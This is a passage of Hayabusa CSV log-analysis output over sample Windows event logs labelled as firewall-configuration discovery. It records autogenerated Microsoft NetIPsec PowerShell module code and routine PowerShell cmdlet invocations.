[Microsoft.Management.Infrastructure.CimSession[]] ${CimSession}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeRule')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [int] ${ThrottleLimit}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeRule')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [switch] ${AsJob}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeRule')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [switch] ${PassThru}) DynamicParam { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper = Microsoft.PowerShell.Utility\New-Object $script:ObjectModelWrapper $__cmdletization_objectModelWrapper.Initialize($PSCmdlet, $script:ClassName, $script:ClassVersion, $script:ModuleVersion, $script:PrivateData) if ($__cmdletization_objectModelWrapper -is [System.Management.Automation.IDynamicParameters]) { ([System.Management.Automation.IDynamicParameters]$__cmdletization_objectModelWrapper).GetDynamicParameters() } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Begin { $__cmdletization_exceptionHasBeenThrown = $false try { __cmdletization_BindCommonParameters $__cmdletization_objectModelWrapper $PSBoundParameters $__cmdletization_objectModelWrapper.BeginProcessing() } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Process { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_queryBuilder = $__cmdletization_objectModelWrapper.GetQueryBuilder() if ($PSBoundParameters.ContainsKey('Name') -and (@('ByName') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Name}) $__cmdletization_queryBuilder.FilterByProperty('InstanceID', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('DisplayName') -and (@('ByDisplayName') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${DisplayName}) $__cmdletization_queryBuilder.FilterByProperty('DisplayName', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Description') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Description}) $__cmdletization_queryBuilder.FilterByProperty('Description', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('DisplayGroup') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${DisplayGroup}) $__cmdletization_queryBuilder.FilterByProperty('DisplayGroup', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Group') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Group}) $__cmdletization_queryBuilder.FilterByProperty('RuleGroup', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('MaxMinutes') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${MaxMinutes}) $__cmdletization_queryBuilder.FilterByProperty('MaxLifetimeMinutes', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('MaxSessions') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${MaxSessions}) $__cmdletization_queryBuilder.FilterByProperty('MaxLifetimeSessions', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('ForceDiffieHellman') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${ForceDiffieHellman}) $__cmdletization_queryBuilder.FilterByProperty('ForceDiffieHellman', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('PrimaryStatus') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PrimaryStatus}) $__cmdletization_queryBuilder.FilterByProperty('PrimaryStatus', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('Status') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Status}) $__cmdletization_queryBuilder.FilterByProperty('Status', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PolicyStoreSource') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PolicyStoreSource}) $__cmdletization_queryBuilder.FilterByProperty('PolicyStoreSource', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PolicyStoreSourceType') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PolicyStoreSourceType}) $__cmdletization_queryBuilder.FilterByProperty('PolicyStoreSourceType', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetIPsecMainModeRule') -and (@('ByAssociatedNetIPsecMainModeRule') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetIPsecMainModeRule}, 'MSFT_NetMainModeRuleMMCryptoSet', 'GroupComponent', 'PartComponent', 'Default') } if ($PSBoundParameters.ContainsKey('All') -and (@('GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('All', ${All}) } if ($PSBoundParameters.ContainsKey('PolicyStore') -and (@('ByName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetIPsecMainModeRule', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('PolicyStore', ${PolicyStore}) } if ($PSBoundParameters.ContainsKey('GPOSession') -and (@('ByName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetIPsecMainModeRule', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('GPOSession', ${GPOSession}) } if ($PSBoundParameters.ContainsKey('TracePolicyStore') -and (@('ByName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetIPsecMainModeRule', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('TracePolicyStore', ${TracePolicyStore}) } $__cmdletization_methodParameters = Microsoft.PowerShell.Utility\New-Object System.Collections.Generic.List[Microsoft.PowerShell.Cmdletization.MethodParameter] switch -exact ($PSCmdlet.ParameterSetName) { { @('ByName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetIPsecMainModeRule', 'GetAll', 'InputObject (cdxml)') -contains $_ } { [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('NewName')) { [object]$__cmdletization_value = ${NewName} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'NewName'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'NewName'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) $__cmdletization_returnValue = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{ Name = 'ReturnValue'; ParameterType = 'System.Int32'; Bindings = 'Error'; Value = $null; IsValuePresent = $false } $__cmdletization_methodInvocationInfo = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodInvocationInfo @('Rename', $__cmdletization_methodParameters, $__cmdletization_returnValue) $__cmdletization_passThru = $PSBoundParameters.ContainsKey('PassThru') -and $PassThru if ($PSBoundParameters.ContainsKey('InputObject')) { foreach ($x in $InputObject) { $__cmdletization_objectModelWrapper.ProcessRecord($x, $__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } else { $__cmdletization_objectModelWrapper.ProcessRecord($__cmdletization_queryBuilder, $__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } End { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper.EndProcessing() } } catch { throw } } # .EXTERNALHELP NetIPsecMainModeCryptoSet.cmdletDefinition.cdxml-Help.xml } Microsoft.PowerShell.Core\Export-ModuleMember -Function 'Rename-NetIPsecMainModeCryptoSet' function Copy-NetIPsecMainModeCryptoSet { [CmdletBinding(DefaultParameterSetName='GetAll', SupportsShouldProcess=$true, ConfirmImpact='Medium', PositionalBinding=$false)] [OutputType([Microsoft.Management.Infrastructure.CimInstance])] [OutputType('Microsoft.Management.Infrastructure.CimInstance#root/standardc",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID800-4103-4104-Firewall configuration enumerated (PowerShell).evtx 2021-10-25 16:23:05.989 +09:00,FS03.offsec.lan,4104,info,,PwSh Scriptblock Log,"imv2/MSFT_NetIKEMMCryptoSet')] param( [Parameter(ParameterSetName='ByName', Mandatory=$true, Position=0)] [Alias('ID')] [ValidateNotNull()] [string[]] ${Name}, [Parameter(ParameterSetName='ByDisplayName', Mandatory=$true)] [ValidateNotNull()] [string[]] ${DisplayName}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Description}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${DisplayGroup}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Group}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [uint32[]] ${MaxMinutes}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [uint32[]] ${MaxSessions}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [bool[]] ${ForceDiffieHellman}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.PrimaryStatus[]] ${PrimaryStatus}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Status}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${PolicyStoreSource}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.PolicyStoreType[]] ${PolicyStoreSourceType}, [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeRule', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetMainModeRule')] [ValidateNotNull()] [ciminstance] ${AssociatedNetIPsecMainModeRule}, [Parameter(ParameterSetName='GetAll')] [switch] ${All}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeRule')] [Parameter(ParameterSetName='GetAll')] [string] ${PolicyStore}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeRule')] [Parameter(ParameterSetName='GetAll')] [string] ${GPOSession}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeRule')] [Parameter(ParameterSetName='GetAll')] [switch] ${TracePolicyStore}, [Parameter(ParameterSetName='InputObject (cdxml)', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#MSFT_NetIKEMMCryptoSet')] [ValidateNotNull()] [ciminstance[]] ${InputObject}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeRule')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [string] ${NewPolicyStore}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeRule')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [string] ${NewGPOSession}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeRule')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [string] ${NewName}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeRule')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [Alias('Session')] [ValidateNotNullOrEmpty()] [Microsoft.Management.Infrastructure.CimSession[]] ${CimSession}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeRule')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [int] ${ThrottleLimit}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeRule')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [switch] ${AsJob}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeRule')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [switch] ${PassThru}) DynamicParam { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper = Microsoft.PowerShell.Utility\New-Object $script:ObjectModelWrapper $__cmdletization_objectModelWrapper.Initialize($PSCmdlet, $script:ClassName, $script:ClassVersion, $script:ModuleVersion, $script:PrivateData) if ($__cmdletization_objectModelWrapper -is [System.Management.Automation.IDynamicParameters]) { ([System.Management.Automation.IDynamicParameters]$__cmdletization_objectModelWrapper).GetDynamicParameters() } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Begin { $__cmdletization_exceptionHasBeenThrown = $false try { __cmdletization_BindCommonParameters $__cmdletization_objectModelWrapper $PSBoundParameters $__cmdletization_objectModelWrapper.BeginProcessing() } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Process { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_queryBuilder = $__cmdletization_objectModelWrapper.GetQueryBuilder() if ($PSBoundParameters.ContainsKey('Name') -and (@('ByName') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Name}) $__cmdletization_queryBuilder.FilterByProperty('InstanceID', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('DisplayName') -and (@('ByDisplayName') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${DisplayName}) $__cmdletization_queryBuilder.FilterByProperty('DisplayName', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Description') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Description}) $__cmdletization_queryBuilder.FilterByProperty('Description', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('DisplayGroup') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${DisplayGroup}) $__cmdletization_queryBuilder.FilterByProperty('DisplayGroup', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Group') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Group}) $__cmdletization_queryBuilder.FilterByProperty('RuleGroup', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('MaxMinutes') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${MaxMinutes}) $__cmdletization_queryBuilder.FilterByProperty('MaxLifetimeMinutes', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('MaxSessions') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${MaxSessions}) $__cmdletization_queryBuilder.FilterByProperty('MaxLifetimeSessions', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('ForceDiffieHellman') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${ForceDiffieHellman}) $__cmdletization_queryBuilder.FilterByProperty('ForceDiffieHellman', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('PrimaryStatus') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PrimaryStatus}) $__cmdletization_queryBuilder.FilterByProperty('PrimaryStatus', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('Status') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Status}) $__cmdletization_queryBuilder.FilterByProperty('Status', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PolicyStoreSource') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PolicyStoreSource}) $__cmdletization_queryBuilder.FilterByProperty('PolicyStoreSource', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PolicyStoreSourceType') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PolicyStoreSourceType}) $__cmdletization_queryBuilder.FilterByProperty('PolicyStoreSourceType', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetIPsecMainModeRule') -and (@('ByAssociatedNetIPsecMainModeRule') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetIPsecMainModeRule}, 'MSFT_NetMainModeRuleMMCryptoSet', 'GroupComponent', 'PartComponent', 'Default') } if ($PSBoundParameters.ContainsKey('All') -and (@('GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('All', ${All}) } if ($PSBoundParameters.ContainsKey('PolicyStore') -and (@('ByName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetIPsecMainModeRule', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('PolicyStore', ${PolicyStore}) } if ($PSBoundParameters.ContainsKey('GPOSession') -and (@('ByName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetIPsecMainModeRule', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('GPOSession', ${GPOSession}) } if ($PSBoundParameters.ContainsKey('TracePolicyStore') -and (@('ByName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetIPsecMainModeRule', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('TracePolicyStore', ${TracePolicyStore}) } $__cmdletization_methodParameters = Microsoft.PowerShell.Utility\New-Object System.Collections.Generic.List[Microsoft.PowerShell.Cmdletization.MethodParameter] switch -exact ($PSCmdlet.ParameterSetName) { { @('ByName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetIPsecMainModeRule', 'GetAll', 'InputObject (cdxml)') -contains $_ } { [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('NewPolicyStore')) { [object]$__cmdletization_value = ${NewPolicyStore} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'NewPolicyStore'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'NewPolicyStore'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('NewGPOSession')) { [object]$__cmdletization_value = ${NewGPOSession} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'NewGPOSession'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'NewGPOSession'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('NewName')) { [object]$__cmdletization_value = ${NewName} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'NewName'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'NewName'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) $__cmdletization_returnValue = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{ Name = 'ReturnValue'; ParameterType = 'System.Int32'; Bindings = 'Error'; Value = $null; IsValuePresent = $false } $__cmdletization_methodInvocationInfo = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodInvocationInfo @('CloneObject', $__cmdletization_methodParameters, $__cmdletization_returnValue) $__cmdletization_passThru = $PSBoundParameters.ContainsKey('PassThru') -and $PassThru if ($PSBoundParameters.ContainsKey('InputObject')) { foreach ($x in $InputObject) { $__cmdletization_objectModelWrapper.ProcessRecord($x, $__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } else { $__cmdletization_objectModelWrapper.ProcessRecord($__cmdletization_queryBuilder, $__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } End { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper.EndProcessing() } } catch { throw } } # .EXTERNALHELP NetIPsecMainModeCryptoSet.cmdletDefinition.cdxml-Help.xml } Microsoft.PowerShell.Core\Export-ModuleMember -Function 'Copy-NetIPsecMainModeCryptoSet'",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID800-4103-4104-Firewall configuration enumerated (PowerShell).evtx 2021-10-25 16:23:06.004 +09:00,FS03.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Get-Command): ""Get-Command"" ParameterBinding(Get-Command): name=""Module""; value=""Microsoft.PowerShell.Core"" ParameterBinding(Get-Command): name=""Name""; value=""Set-StrictMode""",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID800-4103-4104-Firewall configuration enumerated (PowerShell).evtx 2021-10-25 16:23:06.004 +09:00,FS03.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Set-StrictMode): ""Set-StrictMode"" ParameterBinding(Set-StrictMode): name=""Off""; value=""True""",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID800-4103-4104-Firewall configuration enumerated (PowerShell).evtx 2021-10-25 16:23:06.004 +09:00,FS03.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(New-Object): ""New-Object"" ParameterBinding(New-Object): name=""TypeName""; value=""System.Collections.Generic.Dictionary[string,string]""",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID800-4103-4104-Firewall configuration enumerated (PowerShell).evtx 2021-10-25 16:23:06.004 +09:00,FS03.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Export-ModuleMember): ""Export-ModuleMember"" ParameterBinding(Export-ModuleMember): name=""Function""; value=""""",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID800-4103-4104-Firewall configuration enumerated (PowerShell).evtx 2021-10-25 16:23:06.004 +09:00,FS03.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Export-ModuleMember): ""Export-ModuleMember"" ParameterBinding(Export-ModuleMember): name=""Function""; value=""New-NetIPsecMainModeCryptoSet""",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID800-4103-4104-Firewall configuration enumerated (PowerShell).evtx 2021-10-25 16:23:06.004 +09:00,FS03.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Export-ModuleMember): ""Export-ModuleMember"" ParameterBinding(Export-ModuleMember): name=""Function""; value=""Get-NetIPsecMainModeCryptoSet""",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID800-4103-4104-Firewall configuration enumerated (PowerShell).evtx 2021-10-25 16:23:06.004 +09:00,FS03.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Export-ModuleMember): ""Export-ModuleMember"" ParameterBinding(Export-ModuleMember): name=""Function""; value=""Set-NetIPsecMainModeCryptoSet""",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID800-4103-4104-Firewall configuration enumerated (PowerShell).evtx 2021-10-25 16:23:06.004 +09:00,FS03.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Export-ModuleMember): ""Export-ModuleMember"" ParameterBinding(Export-ModuleMember): name=""Function""; value=""Remove-NetIPsecMainModeCryptoSet""",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID800-4103-4104-Firewall configuration enumerated (PowerShell).evtx 2021-10-25 16:23:06.004 +09:00,FS03.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Export-ModuleMember): ""Export-ModuleMember"" ParameterBinding(Export-ModuleMember): name=""Function""; value=""Rename-NetIPsecMainModeCryptoSet""",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID800-4103-4104-Firewall configuration enumerated (PowerShell).evtx 2021-10-25 16:23:06.004 +09:00,FS03.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Export-ModuleMember): ""Export-ModuleMember"" ParameterBinding(Export-ModuleMember): name=""Function""; value=""Copy-NetIPsecMainModeCryptoSet""",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID800-4103-4104-Firewall configuration enumerated (PowerShell).evtx 2021-10-25 16:23:06.004 +09:00,FS03.offsec.lan,4104,info,,PwSh Scriptblock Log,"function __cmdletization_BindCommonParameters { param( $__cmdletization_objectModelWrapper, $myPSBoundParameters ) if ($myPSBoundParameters.ContainsKey('CimSession')) { $__cmdletization_objectModelWrapper.PSObject.Properties['CimSession'].Value = 